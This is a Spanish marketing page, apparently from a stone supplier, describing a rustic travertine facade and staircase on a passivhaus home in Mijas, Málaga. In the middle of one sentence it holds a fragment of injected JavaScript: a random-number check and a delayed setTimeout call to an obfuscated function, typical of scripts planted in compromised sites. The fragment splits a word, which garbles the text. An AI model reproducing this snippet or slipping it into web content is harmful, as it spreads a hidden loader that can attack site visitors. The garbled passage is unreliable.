Project Description

Fachada alero travertino rústico en diseños innovadores.

Alero travertino rústico , es unos de los productos en materiales de construcción más dinámicos e innovadores para el 2020 y 2021.

Esta piedra natural en este caso es Travertino amarillo rústico empleado  para una fachada exterior  en una vivienda localizada  en las playas de Mijas (Màlaga). Como se observa en esta obra  encontramos una combinación entre materiales innovadores y una piedra natural de travertino que otorga a la construcción elegancia y diseño.

Esta composición en piedra travertino, la convierte en un espacio natural localizado en la vivienda y dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando   personalidad propia a la casa.

Esta fachada de mármol travertino se complementa con unas escaleras de travertino que va perfecto con la línea que el arquitecto de la obra le quiso otorgar.

Todo un proyecto passivhaus perteneciente a la urbanización Monteromero dónde se integra la piedra travertino alero rústico con los demás elementos del entorno. En este caso el arquitecto a querido conseguir con la piedra también una hermetización de la temperatura interior con la fachada alero travertino rústico.

En la parte interior de la vivienda observamos como la misma piedra entra desde el exterior. De esta manera podemos conseguir no romper el armonía del mismo elemento natural dentro de la casa.

La fachada alero travertino rústico tiene una peculiaridad que la hace única , la resistencia exterior. Un material natural, capaz de no sufrir cambios por el paso del tiempo. Algo que en la mayoría de los materiales no se observa.

En esta vivienda construida en la zona costera del mediterráneo, contamos por las  característica de la piedra, que no sufrirá alteraciones por los efectos de la brisa marina. Consiguiendo mantener el producto inalterado al paso de los años.

El precio travertino alero, conseguimos que sea uno de los más asequibles del mercado, gracias a la tecnología de extracción disponible.